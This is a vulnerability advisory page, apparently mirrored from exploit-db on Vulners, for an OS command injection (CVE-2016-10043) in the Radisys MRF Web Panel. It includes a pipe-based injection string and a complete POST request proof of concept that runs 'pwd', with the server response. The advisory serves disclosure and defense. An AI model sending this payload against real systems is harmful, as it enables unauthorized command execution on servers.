Vulners
Lucene search
Radisys MRF - Command Injection
🗓️ 27 Jan 2017 00:00:00Reported by Filippos MastrogiannisType 
exploitdb🔗 www.exploit-db.com👁 35 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | Radisys MRF - Command Injection Vulnerability | 27 Jan 201700:00 | – | zdt |
 | CVE-2016-10043 | 31 Jan 201718:00 | – | cve |
 | CVE-2016-10043 | 31 Jan 201718:00 | – | cvelist |
 | Radisys MRF - Command Injection | 27 Jan 201700:00 | – | exploitpack |
 | CVE-2016-10043 | 31 Jan 201718:59 | – | nvd |
 | CVE-2016-10043 | 31 Jan 201718:59 | – | osv |
 | MRF Web Panel 9.0.1 OS Command Injection | 28 Jan 201700:00 | – | packetstorm |
 | Command injection | 31 Jan 201718:59 | – | prion |
Title: MRF Web Panel OS Command Injection
Vendor: Radisys
Vendor Homepage: http://www.radisys.com
Product: MRF Web Panel (SWMS)
Version: 9.0.1
CVE: CVE-2016-10043
CWE: CWE-78
Risk Level: High
Discovery: Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
COSMOTE (OTE Group) Information & Network Security
-----------------------------------------------------------------------------------------
Vulnerability Details:
The MRF Web Panel (SWMS) is vulnerable to OS Command Injection
attacks.
> Affected parameter: MSM_MACRO_NAME (POST parameter)
> Affected file: ms.cgi (/swms/ms.cgi)
> Verified Affected Operation: Show Fatal Error and Log Package Configuration
It is possible to use the pipe character (|) to inject arbitrary OS commands
and retrieve the output in the application's responses:
MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
Proof Of Concept:
1. Login to the vulnerable MRF web panel (with a standard user account):
https://<vulnerable>/swms
2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc)
3. Modify and send the following POST request:
POST /swms/ms.cgi HTTP/1.1
Host: <vulnerable>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<vulnerable>/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
4. Check the output of the injected command 'pwd' in the response:
HTTP/1.1 200 OK
Date: Thu, 21 Jul 2016 08:18:43 GMT
Server: Apache
Cache-Control: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23
/var/opt/swms/www/html
Vulnerability Impact:
Application's own data and functionality or the web server can be compromised due
to OS command injection vulnerabilities. It may also be possible to use the server
as a platform for attacks against other systems.
Disclaimer:
The responsible disclosure policy has been followedData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Jan 2017 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 310
CVSS 210
EPSS0.37587